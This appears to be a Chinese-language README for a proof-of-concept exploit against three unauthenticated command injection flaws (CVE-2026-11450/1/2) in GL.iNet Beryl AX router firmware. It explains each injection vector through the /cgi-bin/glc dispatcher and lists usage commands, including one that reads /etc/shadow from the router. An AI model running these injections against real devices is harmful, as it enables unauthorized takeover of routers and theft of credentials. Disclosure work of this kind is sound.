
PoC 针对 GL.iNet Beryl AX 旅行路由器固件 <=4.4.5 中的三个未经认证的命令注入漏洞(CVE-2026-11450/1/2),利用无需认证的 CGI 调度器进行攻击。
针对 GL.iNet GL-MT3000 (Beryl AX) 旅行路由器固件 <= 4.4.5 中三个未认证命令注入漏洞(CVE-2026-11450、CVE-2026-11451、CVE-2026-11452)的 PoC。
| CVE | CVSS | 技术细节 |
|---|---|---|
| CVE-2026-11450 | 7.3 | 缓冲区大小不匹配(0x40 vs 0x100)绕过 access() 门,通过 system() 注入 $() |
| CVE-2026-11451 | 7.3 | FTP 的 media_dir 参数中单引号转义打破 shell 引号机制 |
| CVE-2026-11452 | 7.3 | 双引号 printf 内的 Samba 密码参数中存在 $() 命令替换 |
三者均利用未认证的 /cgi-bin/glc CGI 调度器,该调度器通过 dlopen/dlsym 加载插件,无需认证或方法白名单。
# 利用所有三个 CVE
python3 poc.py http://192.168.8.1
# 利用特定 CVE
python3 poc.py http://192.168.8.1 -c "id" -v 11450
python3 poc.py https://192.168.8.1 -c "id" -v 11451
python3 poc.py https://192.168.8.1 -c "id" -v 11452
# 自定义命令和输出文件
python3 poc.py http://192.168.8.1 -c "cat /etc/shadow" -o /tmp/pwned
仅用于教育和授权的安全研究目的。请勿对非您拥有或未经明确许可的系统使用。